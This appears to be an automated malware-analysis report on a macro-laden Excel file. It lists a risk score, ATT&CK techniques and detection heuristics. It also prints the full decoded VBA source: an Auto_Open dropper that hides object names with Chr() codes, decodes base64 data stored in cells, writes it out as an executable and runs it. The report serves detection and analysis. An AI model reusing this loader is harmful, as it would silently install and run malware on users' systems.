MALICIOUS
348
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1105 Ingress Tool Transfer
This Excel document contains an Auto_Open VBA macro that is obfuscated and uses CreateObject and Shell calls. The macro is designed to download and execute a second-stage payload, as indicated by the ClamAV detection of 'Xls.Malware.Valyria-6865621-0'. The presence of these indicators strongly suggests a malicious intent to compromise the user's system.
Heuristics 7
-
ClamAV: Xls.Malware.Valyria-6865621-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-6865621-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Call rit(pth, b) Shell (pth) End Sub -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Dim DM, EL Set DM = CreateObject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(68) & Chr(79) & Chr(77)) Set EL = DM.createElement(Chr(116) & Chr(109) & Chr(112)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim DM, EL Set DM = CreateObject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(68) & Chr(79) & Chr(77)) Set EL = DM.createElement(Chr(116) & Chr(109) & Chr(112)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Attribute VB_Name = "Module1" Sub Auto_Open() Call Sh3JBuUJ
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1957 bytes |
SHA-256: 2b05c3cd1bd86bcdf17444898168f14d8847b75c4ff18dae4569b224cd0226f2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Workbook______________"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Worksheet______1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Auto_Open()
Call Sh3JBuUJ
End Sub
Function GetVal(sr As Long, er As Long, c As Long)
Dim x
For i = sr To er
x = x + Cells(i, c)
Next
GetVal = x
End Function
Function GetRand()
Dim r As String
Dim i As Integer
Randomize
For i = 1 To 8
If i Mod 2 = 0 Then
r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r
Else
r = Int((9 * Rnd) + 1) & r
End If
Next i
GetRand = r
End Function
Function dec(b64)
Dim DM, EL
Set DM = CreateObject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(68) & Chr(79) & Chr(77))
Set EL = DM.createElement(Chr(116) & Chr(109) & Chr(112))
EL.DataType = Chr(98) & Chr(105) & Chr(110) & Chr(46) & Chr(98) & Chr(97) & Chr(115) & Chr(101) & Chr(54) & Chr(52)
EL.Text = b64
dec = EL.NodeTypedValue
End Function
Sub rit(file, bytes)
Dim b
Set b = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(68) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))
b.Type = 1
b.Open
b.Write bytes
b.SaveToFile file, 2
End Sub
Sub Sh3JBuUJ()
Dim p, pth As String
Dim b
pth = Application.UserLibraryPath & GetRand & Chr(46) & Chr(101) & Chr(120) & Chr(101)
p = GetVal(3558, 3562, 209)
b = dec(p)
Call rit(pth, b)
Shell (pth)
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 44544 bytes |
SHA-256: fce2e080ecd76266f7614bdcecd8edc57f6231a0816edbcd776eefb2225b0243 |
|||
|
Detection
ClamAV:
Xls.Malware.Valyria-6865621-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.